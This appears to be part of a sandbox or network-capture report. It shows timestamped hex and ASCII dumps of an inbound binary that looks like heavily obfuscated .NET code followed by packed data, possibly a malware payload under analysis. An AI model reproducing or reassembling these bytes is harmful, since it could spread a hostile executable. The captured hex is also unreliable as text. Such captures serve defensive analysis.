                      2023-10-24 07:28:52 UTC32INData Raw: 02 2b 0c 21 5a 5f b2 a5 ff ff ff ff b7 2b 0c 7e 27 00 00 0a 8e 20 f9 30 00 00 58 00 00 7e 27 00 00 0a 8e 1f 1f 58 28 03 00 00 06 28 57 00 00 0a 6f a1 00 00 0a 11 41 6f f0 00 00 0a 16 6f f2 00 00 0a 11 41 6f f0 00 00 0a 16 6f f3 00 00 0a 7e 27 00 00 0a 8e 20 ab ea 00 00 58 7e 27 00 00 0a 8e 20 46 e4 00 00 58 fe 1c 20 00 00 01 1f fa 58 28 03 00 00 06 80 12 00 00 04 11 41 6f f0 00 00 0a 16 6f f4 00 00 0a 11 41 6f f0 00 00 0a 17 6f f5 00 00 0a 11 41 6f f6 00 00 0a 26 11 41 6f a3 00 00 0a de 0c 11 41 2c 07 11 41 6f 5e 00 00 0a dc de 0f 25 28 32 00 00 0a 13 87 28 33 00 00 0a de 00 73 ef 00 00 0a 28 4c 00 00 06 28 4b 00 00 06 6f f0 00 00 0a 13 0a 11 0a 7e 27 00 00 0a 8e 20 40 72 00 00 58 7e 27 00 00 0a 8e 20 fe 7b 00 00 58 20 a4 00 00 00 1f f0 58 d3 b7 28 03 00
                      Data Ascii: +!Z_+~' 0X~'X((WoAooAoo~' X~' FX X(AooAooAo&AoA,Ao^%(2(3s(L(Ko~' @rX~' {X X(
                      2023-10-24 07:28:52 UTC34INData Raw: 20 2c 8f 00 00 11 64 20 1b 05 c2 0d 59 20 00 00 c8 40 11 64 5a 1f 13 64 33 02 2b 0e 7e 27 00 00 0a 8e 20 b3 9f 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 96 88 74 81 58 00 20 3d 01 00 00 11 1b 5a 20 cb dc ff ff 58 20 c3 00 00 00 11 1b 5a 58 20 d3 f1 ff ff 2e 02 2b 0e 7e 27 00 00 0a 8e 20 98 24 39 b9 58 2b 0c fe 1c 2d 00 00 01 20 9a 00 00 00 58 00 28 03 00 00 06 a2 11 23 1c 11 5d 6f 72 00 00 0a 6f 73 00 00 0a 6f 03 01 00 0a a2 11 23 1d 20 00 00 00 04 1f 18 06 5a 1e 06 5a 58 5a 20 00 00 00 e0 58 06 1c 5e 2e 02 2b 0e 7e 27 00 00 0a 8e 20 80 b8 0a 74 58 2b 0c 7e 27 00 00 0a 8e 20 2f 06 01 00 58 00 20 69 d5 21 48 20 6e cc 20 48 da 7e 27 00 00 0a 8e 1f 57 58 28 03 00 00 06 a2 11 23 28 6e 00 00 0a 13 05 de 0f 25 28 32 00 00 0a 13 21 28 33 00 00 0a de 00 06 17 d6 0a 06
                      Data Ascii: ,d Y @dZd3+~' X+~' tX =Z X ZX .+~' $9X+- X(#]oroso# ZZXZ X^.+~' tX+~' /X i!H n H~'WX(#(n%(2!(3
                      2023-10-24 07:28:52 UTC35INData Raw: 00 08 00 11 39 5a 11 39 1f 13 62 61 5f 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 6f 88 44 7a 58 2b 0c fe 1c 2e 00 00 01 20 9a f8 d2 67 58 00 2b 0c 7e 27 00 00 0a 8e 20 bd e7 00 00 58 00 2b 0c fe 1c 43 00 00 01 20 26 8b 50 73 58 00 00 2b 51 06 1a 5e 20 95 08 02 0e 61 16 33 02 2b 0c 23 00 00 00 31 ad f9 b0 41 b7 2b 36 11 07 20 00 00 80 d8 5a 65 66 1f 20 11 07 20 8d 01 00 00 5a 1f 73 11 07 5a 58 65 5a 33 02 2b 09 20 ea 88 ab 17 18 d8 2b 0c 7e 27 00 00 0a 8e 20 8a eb 37 9c 58 00 00 00 21 78 fb 00 00 00 00 00 00 69 13 9f 11 9f 11 a1 1f 19 64 20 00 60 15 01 58 11 a1 20 dc 0e 0e 0a 5e 1f 11 64 2e 02 2b 0e 7e 27 00 00 0a 8e 20 63 76 2c 7b 58 2b 58 11 79 20 ba 87 05 00 5c 20 00 00 00 c0 59 11 67 20 02 9b 30 00 5c 65 1f 40 5c 33 02 2b 0b 7e 27 00 00 0a 8e 1f 52 58 2b 2e
                      Data Ascii: 9Z9ba_.+~' oDzX+. gX+~' X+C &PsX+Q^ a3+#1A+6 Zef ZsZXeZ3+ +~' 7X!xid `X ^d.+~' cv,{X+Xy \ Yg 0\e@\3+~'RX+.
                      2023-10-24 07:28:52 UTC36INData Raw: 80 60 5f 20 01 02 00 00 33 02 2b 0e 7e 27 00 00 0a 8e 20 5b 4d 31 96 58 2b 2c 11 5c 20 00 04 00 00 5e 20 9c 6a 16 ba 2e 02 2b 0e 7e 27 00 00 0a 8e 20 92 b6 d6 93 58 2b 0c 7e 27 00 00 0a 8e 20 f3 72 49 67 58 00 00 2b 35 7e 0b 00 00 04 13 53 11 53 20 96 14 00 00 58 20 23 08 00 00 59 11 53 20 82 10 00 00 60 2e 02 2b 07 20 35 33 2f 7d 2b 0c 7e 27 00 00 0a 8e 20 c2 44 00 00 58 00 00 00 00 2b 0a 23 00 00 c0 14 d3 09 d8 c1 b7 00 7e 27 00 00 0a 8e 20 b2 58 00 00 58 7e 27 00 00 0a 8e 20 b9 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 4d 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 fe 1c 2e 00 00 01 20 0d 5b 00 00 58 20 5a 06 b3 4a 20 de 48 4d b5 d6 20 de 24 23 1b 20 0b dc dc e4 d6 d3 69 28 03 00 00 06 16 8d 12 00 00 01 14 14 14 17 28 92 00 00 0a 26 38 c3 58
                      Data Ascii: `_ 3+~' [M1X+,\ ^ j.+~' X+~' rIgX+5~SS X #YS `.+ 53/}+~' DX+#~' XX~' X((P3Mm{?(. [X ZJ HM $# i((&8X
                      2023-10-24 07:28:52 UTC38INData Raw: 11 58 2b 0c 7e 27 00 00 0a 8e 20 d4 5f 35 1b 58 00 2b 05 20 48 3d 00 00 00 00 7e 27 00 00 0a 8e 20 9a 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 18 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 11 2a 20 ba 87 05 00 5c 20 00 00 00 c0 59 11 7d 20 02 9b 30 00 5c 65 1f 40 5c 2e 02 2b 0e 7e 27 00 00 0a 8e 20 46 cb ae 69 58 2b 6a 11 0c 20 00 70 12 c7 59 1f 10 11 0c 20 00 00 00 40 5c 11 0c 1f 10 5c 61 5a 2e 02 2b 40 20 ee 19 00 00 11 13 20 7f 01 00 00 5a 58 11 13 20 81 02 00 00 5a 58 20 4a ff ff ff 60 1f ee 2e 02 2b 0e fe 1c 4f 00 00 01 20 01 00 90 59 58 2b 0c fe 1c 2d 00 00 01 20 7d d8 17 87 58 00 2b 0c 7e 27 00 00 0a 8e 20 af 0e 01 00 58 00 00 7e 27 00 00 0a 8e 20 7c 01 01 00 58 11 13 20 a5 05 00 00 5c 20 4b a0 00 82 58 20 ff ff ff 7f 60 15 2e
                      Data Ascii: X+~' _5X+ H=~' X((P@m{?(* \ Y} 0\e@\.+~' FiX+j pY @\\aZ.+@ ZX ZX J`.+O YX+- }X+~' X~' |X \ KX `.
                      2023-10-24 07:28:52 UTC39INData Raw: 03 00 00 06 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 56 00 00 06 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 57 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 dd 8b 00 00 00 28 32 00 00 0a fe 1c 07 00 00 01 20 06 5c 00 00 58 fe 1c 20 00 00 01 20 f9 50 00 00 58 20 92 0c 26 07 20 5c f4 d9 f8 d6 d3 69 28 03 00 00 06 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 7e 27 00 00 0a 8e 20 d0 91 00 00 58 20 fc 38 86 db 20 8f bf 86 db 61 7e 27 00 00 0a 8e 20 99 00 00 00 58 28 03 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 28 33 00 00 0a de 00 38 2b 4e 00 00 11 9e fe 1c 1f 00 00 01 20 e9 18 01 00 58 20 00 80 03 fd 11 2a 5a 20 3f
                      Data Ascii: ~4(((~4(m{?(V(m{?(W((V(C(2 \X PX & \i(~4(((~4(~' X 8 a~' X(((V(C(38+N X *Z ?
                      2023-10-24 07:28:52 UTC40INData Raw: 28 8d 00 00 0a 11 81 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 8d 00 00 0a 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 81 49 00 00 11 9e 7e 27 00 00 0a 8e 20 b3 aa 00 00 58 7e 27 00 00 0a 8e 20 5e bf 00 00 58 7e 27 00 00 0a 8e 20 ba 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 2d 11 6d 7b 3f 00 00 04 17 9a 16 73 0c 01 00 0a 13 9b 11 9b 11 6d 7b 3f 00 00 04 18 9a 6f fe 00 00 0a 11 9b 6f 0d 01 00 0a 38 20 49 00 00 11 9e 7e 27 00 00 0a 8e 20 dd 06 01 00 58 fe 1c 07 00 00 01 20 66 1b 01 00 58 7e 27 00 00 0a 8e 20 a2 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 07 01 00 00 73 b6 00 00 0a 13 85 11 6d 7b 3f 00 00 04 17 9a 73 0e 01 00 0a 13 6f 11 6f 11 6d 7b 3f 00 00 04 18 9a 28 6a 00 00 0a 11 6d 7b 3f 00 00 04 19
                      Data Ascii: ((~4(m{?(((V(C8I~' X~' ^X~' X((P3-m{?sm{?oo8 I~' X fX~' X((P@sm{?soom{?(jm{?
                      2023-10-24 07:28:52 UTC42INData Raw: 00 00 06 14 20 07 86 29 93 20 36 79 28 93 da 7e 27 00 00 0a 8e 20 ad 1c 01 00 58 fe 1c 07 00 00 01 20 af 00 00 00 58 28 03 00 00 06 17 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 13 40 11 40 14 14 17 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 cc 43 00 00 11 9e 11 64 1f 58 11 64 5a 1f 28 11 64 5a 58 65 60 20 96 1c 00 00 11 64 60 61 1f 40 5f 16 33 02 2b 0c 21 40 5b 8d 74 00 00 00 00 b7 2b 0c fe 1c 43 00 00 01 20 2f 1a 00 00 58 00 7e 27 00 00 0a 8e 20 1e 0a 00 00 58 11 80 18 5c 20 c7 da ff ff 61 16 33 02 2b 0e fe 1c 20 00 00 01 20 d9 00 00 00 58 2b 0a 23 00 00 00 68 90 d7
                      Data Ascii: ) 6y(~' X X(m{?##@@;>>>(&>,"#@(!($(t8CdXdZ(dZXe` d`a@_3+!@[t+C /X~' X\ a3+ X+#h
                      2023-10-24 07:28:52 UTC43INData Raw: 1c 07 00 00 01 20 d4 fd 00 00 58 7e 27 00 00 0a 8e 20 f1 00 00 00 58 28 03 00 00 06 15 16 28 8b 00 00 0a 13 63 16 13 a3 38 91 00 00 00 11 63 11 a3 9a 13 4c 11 4c 28 56 00 00 0a 28 81 00 00 0a 2c 26 11 4c 28 56 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 11 4c 28 56 00 00 0a 28 4f 00 00 0a 28 42 00 00 0a 28 9c 00 00 0a 11 4c 28 56 00 00 0a 28 1b 01 00 0a 2c 31 28 0b 00 00 06 6f 08 01 00 0a 11 4c 28 56 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 11 4c 28 56 00 00 0a 28 4f 00 00 0a 28 42 00 00 0a 17 6f 1c 01 00 0a de 0f 25 28 32 00 00 0a 13 04 28 33 00 00 0a de 00 11 a3 17 d6 13 a3 11 a3 11 63 8e b7 3f 64 ff ff ff 38 39 3e 00 00 11 9e fe 1c 4f 00 00 01 20 2f 13 01 00 58 20 c9 76 80 4d 20 6d 8b 80 b2 d6 7e 27 00 00 0a 8e 1f 11 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 ba 01
                      Data Ascii: X~' X((c8cLL(V(,&L(Vm{?L(V(O(B(L(V(,1(oL(Vm{?L(V(O(Bo%(2(3c?d89>O /X vM m~'X((P@
                      2023-10-24 07:28:52 UTC44INData Raw: 0a 8e 20 b4 d1 00 00 58 00 7e 27 00 00 0a 8e 1f 6a 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 2c 28 0b 00 00 06 6f 1f 01 00 0a 6f 20 01 00 0a 28 0b 00 00 06 6f 1f 01 00 0a 11 6d 7b 3f 00 00 04 17 9a 6f 21 01 00 0a 38 62 39 00 00 11 9e 7e 0d 00 00 04 13 11 11 11 20 00 00 00 14 5a 1f 13 64 66 7e 08 00 00 04 13 49 11 49 1b 62 2e 02 2b 0e 7e 27 00 00 0a 8e 20 39 0c f3 a9 58 2b 2f 11 9a 1f 20 5e 1f 10 5c 17 5f 17 11 9a 1a 64 5f 33 02 2b 0e fe 1c 28 00 00 01 20 6e b2 c9 da 58 2b 0c 7e 27 00 00 0a 8e 20 8a 46 00 00 58 00 00 18 11 07 5a 20 1a 18 00 00 58 11 07 1f 3e 5a 58 1c 64 20 b6 21 00 00 59 11 07 2e 02 2b 2f 20 00 00 00 92 11 45 5a 20 63 0a 00 00 5f 16 33 02 2b 0d 20 1f 4e 65 71 20 81 f3 38 03 d6 2b 0c fe 1c 07 00 00 01 20 d6 b9 cb 95 58 00 2b 0c fe 1c 20 00
                      Data Ascii: X~'jX((P3,(oo (om{?o!8b9~ Zdf~IIb.+~' 9X+/ ^\_d_3+( nX+~' FXZ X>ZXd !Y.+/ EZ c_3+ Neq 8+ X+
                      2023-10-24 07:28:52 UTC46INData Raw: 33 00 00 0a de 00 7e 37 00 00 04 2d 30 7e 27 00 00 0a 8e 20 cf 5e 00 00 58 7e 27 00 00 0a 8e 20 29 79 00 00 58 fe 1c 1f 00 00 01 1f 32 58 28 03 00 00 06 28 43 00 00 06 dd 29 34 00 00 7e 37 00 00 04 28 18 01 00 0a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 73 f8 00 00 58 20 76 24 00 00 11 77 18 5a 11 77 18 5a 58 61 16 33 02 2b 0e fe 1c 2e 00 00 01 20 24 ef 00 00 58 2b 25 7e 0d 00 00 04 13 46 11 46 1f 20 5c 16 32 02 2b 0e 7e 27 00 00 0a 8e 20 0e ea d2 3f 58 2b 05 20 c9 a2 33 a5 00 00 20 da 00 00 00 28 03 00 00 06 1b 8d 12 00 00 01 13 99 11 99 16 7e 1c 00 00 04 a2 11 99 17 7e 1d 00 00 04 a2 11 99 18 7e 1f 00 00 04 a2 11 99 19 7e 1e 00 00 04 a2 11 99 1a 28 1b 00 00 06 a2 11 99 13 40 11 40 14 14 1b 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c
                      Data Ascii: 3~7-0~' ^X~' )yX2X((C)4~7((~' sX v$wZwZXa3+. $X+%~FF \2+~' ?X+ 3 (~~~~(@@;>>>>
                      2023-10-24 07:28:52 UTC47INData Raw: 2b 0c 7e 27 00 00 0a 8e 20 82 33 b2 92 58 00 00 00 2b 0c 7e 27 00 00 0a 8e 20 27 00 90 76 58 00 7e 27 00 00 0a 8e 20 e2 00 00 00 58 28 03 00 00 06 28 43 00 00 06 dd d2 2e 00 00 7e 39 00 00 04 28 18 01 00 0a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 8e bc 00 00 58 fe 1c 43 00 00 01 20 a7 aa 00 00 58 7e 27 00 00 0a 8e 1f 2a 58 28 03 00 00 06 1b 8d 12 00 00 01 13 99 11 99 16 7e 1c 00 00 04 a2 11 99 17 7e 1d 00 00 04 a2 11 99 18 7e 1f 00 00 04 a2 11 99 19 7e 1e 00 00 04 a2 11 99 1a 28 1b 00 00 06 a2 11 99 13 40 11 40 14 14 1b 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c 11 3e 19 17 9c 11 3e 1a 16 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 80 1c 00 00
                      Data Ascii: +~' 3X+~' 'vX~' X((C.~9((~' XC X~'*X(~~~~(@@;>>>>>>>(&>,"@(!($(t
                      2023-10-24 07:28:52 UTC48INData Raw: 1c 43 00 00 01 20 e2 fe 00 00 58 16 13 5f 11 5f 28 03 00 00 06 16 28 50 00 00 0a 16 33 42 7e 3c 00 00 04 6f 75 00 00 0a de 0f 25 28 32 00 00 0a 13 17 28 33 00 00 0a de 00 11 6d 25 fe 07 61 00 00 06 73 63 00 00 0a 73 64 00 00 0a 80 3c 00 00 04 7e 3c 00 00 04 6f 65 00 00 0a 38 43 29 00 00 11 9e 23 00 00 00 00 40 11 e9 40 69 7e 27 00 00 0a 8e 20 d1 d3 00 00 58 20 54 12 00 00 11 4b 1f 1a 62 61 1f 15 62 66 11 4b 1f 1d 5c 2e 02 2b 2c 20 c7 da ff ff 11 09 18 5c 61 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 a8 7a ae b2 58 2b 0c fe 1c 2e 00 00 01 20 db b9 c9 76 58 00 2b 08 7e 27 00 00 0a 8e 19 58 00 28 03 00 00 06 16 28 50 00 00 0a 16 33 20 7e 3c 00 00 04 6f 75 00 00 0a de 0f 25 28 32 00 00 0a 13 9c 28 33 00 00 0a de 00 38 b0 28 00 00 11 9e 7e 27 00 00 0a 8e 20 35 da 00
                      Data Ascii: C X__((P3B~<ou%(2(3m%ascsd<~<oe8C)#@@i~' X TKbabfK\.+, \a.+~' zX+. vX+~'X((P3 ~<ou%(2(38(~' 5
                      2023-10-24 07:28:52 UTC50INData Raw: 2b 0e 21 b7 35 00 00 00 00 00 00 69 13 1d 11 1d 00 00 2b 0b 20 3b 7e 55 79 20 d5 97 ed fc 61 00 fe 1c 3c 00 00 01 1f 1f 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 a8 01 00 00 11 13 20 80 d2 04 00 5a 1f 48 59 20 40 4d 03 00 59 11 13 20 00 c7 21 00 5a 33 05 38 12 01 00 00 7e 0c 00 00 04 13 90 11 90 20 d5 e1 ff ff 5f 11 90 1f 19 5c 5f 1d 62 66 20 00 00 00 84 11 90 5a 33 02 2b 0a 20 8a 50 00 00 38 e1 00 00 00 20 f0 21 00 00 20 c0 00 00 00 11 8f 5a 1f 40 11 8f 5a 58 65 61 16 2e 02 2b 37 11 9a 20 00 a0 15 02 5a 20 f4 11 00 00 58 20 c4 e7 ff ff 2e 02 2b 0e 7e 27 00 00 0a 8e 20 5e d1 6d c4 58 2b 0c fe 1c 28 00 00 01 20 1b 92 54 92 58 00 38 8f 00 00 00 20 80 00 00 00 7e 0b 00 00 04 13 a6 11 a6 1d 62 20 56 06 00 00 11 a6 5f 11 a6 20 80 ed f6 ff 5a 59 61 5f 16 2e 02
                      Data Ascii: +!5i+ ;~Uy a<X((P@ ZHY @MY !Z38~ _\_bf Z3+ P8 ! Z@ZXea.+7 Z X .+~' ^mX+( TX8 ~b V_ ZYa_.
                      2023-10-24 07:28:52 UTC51INData Raw: 2b 0a 23 00 00 00 00 c0 88 d1 40 b7 00 20 db 5f 3a f7 20 13 f3 c5 08 d6 20 49 01 00 00 11 1f 5a 20 b7 06 00 00 11 1f 5a 58 1f 52 5c 20 b6 e2 03 59 33 02 2b 0e 7e 27 00 00 0a 8e 20 d2 00 00 00 58 2b 36 20 ff ff 7f 00 11 67 20 c7 42 0a 00 5c 20 63 4b 51 00 5e 60 20 ff ff 7f 00 33 02 2b 0c 21 a1 7f af 7a 00 00 00 00 b7 2b 0c fe 1c 3c 00 00 01 20 d3 b0 97 85 58 00 00 28 03 00 00 06 16 28 50 00 00 0a 16 40 db 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 da 57 00 00 58 20 da 0e 00 00 11 a1 20 7f b5 72 1b 5c 61 16 2e 02 2b 0e fe 1c 3c 00 00 01 20 0d 23 ef ab 58 2b 31 20 cf 04 00 00 11 13 20 2a ea 61 1e 5c 60 20 cf 04 00 00 2e 02 2b 0d 20 90 db 03 a5 20 b4 9e 03 a5 61 2b 0c fe 1c 07 00 00 01 20 d9 13 5a 8b 58 00 00 11 48 20 00 10 00
                      Data Ascii: +#@ _: IZ ZXR\ Y3+~' X+6 g B\ cKQ^` 3+!z+< X((P@m{?(~' WX r\a.+< #X+1 *a\` .+ a+ ZXH
                      2023-10-24 07:28:52 UTC52INData Raw: 58 60 1f fe 2e 02 2b 0b 7e 27 00 00 0a 8e 1f 10 58 2b 0c 7e 27 00 00 0a 8e 20 b8 98 3a 3f 58 00 00 28 03 00 00 06 16 28 50 00 00 0a 16 40 24 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 f2 14 00 00 58 7e 27 00 00 0a 8e 20 8e 0d 00 00 58 7e 27 00 00 0a 8e 20 c1 00 00 00 58 28 03 00 00 06 19 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 18 11 6d 7b 3f 00 00 04 13 4a 11 4a 1a 13 0c 11 0c 9a a2 11 99 13 40 11 40 14 14 19 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00
                      Data Ascii: X`.+~'X+~' :?X((P@$m{?(~' X~' X~' X(m{?##m{?CCm{?JJ@@;>>>>>(&>,"#@(!($(t
                      2023-10-24 07:28:52 UTC54INData Raw: 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 22 11 4a 11 0c 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 f4 13 00 00 11 9e 7e 27 00 00 0a 8e 20 87 62 00 00 58 20 00 17 00 00 18 7e 0b 00 00 04 13 25 11 25 5a 1c 11 25 5a 58 11 25 20 00 40 3f 4e 5f 59 5f 11 25 19 62 20 00 17 00 00 5f 33 02 2b 0e 7e 27 00 00 0a 8e 20 78 73 a7 ad 58 2b 0c fe 1c 4f 00 00 01 20 ae 80 00 00 58 00 1f 3c 28 03 00 00 06 16 28 50 00 00 0a 16 33 4a 23 00 00 00 00 40 a4 d9 40 b7 7e 27 00 00 0a 8e 20 85 74 00 00 58 7e 27 00 00 0a 8e 20 b5 00 00 00 58 28 03 00 00 06 7e 34 00 00 04 28 dc 00 00 0a 28 1b 00 00 06 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 44 13 00 00 11 9e 20 c2
                      Data Ascii: @(!($(t>,"J@(!($(t8~' bX ~%%Z%ZX% @?N_Y_%b _3+~' xsX+O X<((P3J#@@~' tX~' X(~4((((V(C8D
                      2023-10-24 07:28:52 UTC58INData Raw: 01 20 c3 0e 01 00 58 2b 0c fe 1c 28 00 00 01 20 45 9c 61 9e 58 00 1f 55 28 03 00 00 06 7e 34 00 00 04 28 dc 00 00 0a 28 1b 00 00 06 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 7a 03 00 00 11 9e 21 f0 aa 00 00 00 00 00 00 b7 11 54 20 70 48 00 00 5a 19 5f 16 33 02 2b 34 11 9f 20 ff 23 00 00 60 20 21 26 00 00 59 20 aa 03 cd 6a 33 02 2b 0e 7e 27 00 00 0a 8e 20 65 d8 a3 67 58 2b 0c fe 1c 3c 00 00 01 20 36 10 fb cb 58 00 2b 0c 7e 27 00 00 0a 8e 20 8e b3 00 00 58 00 7e 27 00 00 0a 8e 20 95 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 60 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 fe 1c 4f 00 00 01 20 54 7a 00 00 58 7e 27 00 00 0a 8e 20 05 65 00 00 58 11 27 1f 09 62 20 df e4 ff ff 2e 02 2b 10 23 00 00 00 cf 46 60 b8 c1 b7 13 8c 11 8c 2b 09 7e
                      Data Ascii: X+( EaXU(~4((((V(C8z!T pHZ_3+4 #` !&Y j3+~' egX+< 6X+~' X~' X((P@`m{?(O TzX~' eX'b .+#F`+~
                      2023-10-24 07:28:52 UTC62INData Raw: 00 00 00 09 00 00 11 16 0a 00 06 2a 00 00 00 1e 02 28 1f 00 00 0a 2a 03 30 08 00 ed 00 00 00 0a 00 00 11 02 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 1c 89 00 00 58 17 7e 10 00 00 04 0a 06 65 5f 20 50 15 00 00 06 58 17 5f 33 02 2b 0e fe 1c 28 00 00 01 20 6e 3a bf be 58 2b 6c 20 2e e4 ff 0f 06 1f 1c 62 5f 16 33 02 2b 50 06 1f 09 62 1f 98 2e 02 2b 37 06 20 ce e3 07 00 5c 06 20 00 00 80 00 5a 59 20 56 8f 00 00 61 16 33 02 2b 0e 7e 27 00 00 0a 8e 20 70 f9 29 4d 58 2b 0c fe 1c 4f 00 00 01 20 67 e0 ea 38 58 00 2b 0c 7e 27 00 00 0a 8e 20 e6 bf bd dd 58 00 2b 0c 7e 27 00 00 0a 8e 20 5a 8d 00 00 58 00 00 20 76 23 00 00 06 58 17 5f 06 17 5f 33 02 2b 0e 7e 27 00 00 0a 8e 20 69 88 36 79 58 2b 0c 7e 27 00 00 0a 8e 20 9a 00 00 00 58 00 28 03 00 00 06
                      Data Ascii: *(*0{?(~' X~e_ PX_3+( n:X+l .b_3+Pb.+7 \ ZY Va3+~' p)MX+O g8X+~' X+~' ZX v#X__3+~' i6yX+~' X(
                      2023-10-24 07:28:52 UTC66INData Raw: 1c c1 93 dd c8 90 8c 65 fc 6b 6f 84 2d 7d 2e 6a f2 1c e2 6f 1e 86 f2 d4 dd 31 03 32 84 2d 7d 30 6a f2 1c 18 d4 75 a1 59 90 ce 09 db de 84 2d 7d 30 6a f2 1c 5b 71 aa f8 cf bf 00 96 8d be 84 2d 7d 2d 6a f2 1c e3 82 40 40 89 de 50 7d 16 86 84 2d 7d 2f 6a f2 1c 41 54 85 dc 49 15 75 0a cc 40 85 2d 7d 30 6a f2 1c 64 9a a7 d1 d1 92 59 7a b8 54 85 2d 7d 30 6a f2 1c 9b dc d4 fe 9a 6d cb 35 bd 17 85 2d 7d 31 6a f2 1c 5c c0 06 40 70 c1 2b 61 90 c4 85 2d 7d 31 6a f2 1c 66 93 8a 33 c9 2c dc 9c 14 6f 86 2d 7d 2b 6a f2 1c 66 d3 b2 f5 2b 1a a9 9d 0a 20 86 2d 7d 29 6a f2 1c 8a 3b 8d 90 92 93 29 a3 5b e9 86 2d 7d 29 6a f2 1c e3 78 36 69 3b 78 e1 96 bf a3 86 2d 7d 29 6a f2 1c 51 b8 79 43 d3 40 88 51 cf 4b 87 2d 7d 29 6a f2 1c a4 ad bb ba 4e c3 ab f9 d2 ea 87 2d 7d 2f 6a f2
                      Data Ascii: eko-}.jo12-}0juY-}0j[q-}-j@@P}-}/jATIu@-}0jdYzT-}0jm5-}1j\@p+a-}1jf3,o-}+jf+ -})j;)[-})jx6i;x-})jQyC@QK-})jN-}/j
                      2023-10-24 07:28:52 UTC68INData Raw: 59 45 c0 76 8e a8 2d 7d 2d 6a f2 1c 1e 7d fd 94 59 5c ee 46 b7 53 a9 2d 7d 2f 6a f2 1c b7 3a 8e 92 e7 f5 c8 f2 34 30 a9 2d 7d 2f 6a f2 1c 62 fd 53 54 02 75 dc d3 b0 37 a9 2d 7d 2e 6a f2 1c f2 ed 66 ca 36 87 34 a1 24 e5 a9 2d 7d 31 6a f2 1c 89 60 b1 e8 b5 c5 b1 bf 37 f2 a9 2d 7d 2f 6a f2 1c 71 2b 3d 8d 2c 75 1e b2 dd a3 a9 2d 7d 39 6a f2 1c 67 f2 37 d3 3c 28 b4 0b ff 7d aa 2d 7d 32 6a f2 1c 1f a6 73 cf 5d eb 92 35 d7 5c aa 2d 7d 34 6a f2 1c 84 31 d6 64 35 03 88 81 2c 23 aa 2d 7d 2c 6a f2 1c b3 e0 47 97 0a 07 a4 9e 64 f6 aa 2d 7d 14 6a f2 1c 0d 23 6b 26 e9 a2 ea 4d 31 7c ab 2d 7d 34 6a f2 1c 0a 06 82 74 7a 2a 31 c5 d1 76 ab 2d 7d 31 6a f2 1c 56 eb d6 3b c9 3d 5d 49 d8 10 ab 2d 7d 44 6a f2 1c 2e d6 cd 32 93 f9 39 60 18 fc ab 2d 7d 44 6a f2 1c 14 53 22 ad 40
                      Data Ascii: YEv-}-j}Y\FS-}/j:40-}/jbSTu7-}.jf64$-}1j`7-}/jq+=,u-}9jg7<(}-}2js]5\-}4j1d5,#-},jGd-}j#k&M1|-}4jtz*1v-}1jV;=]I-}Dj.29`-}DjS"@
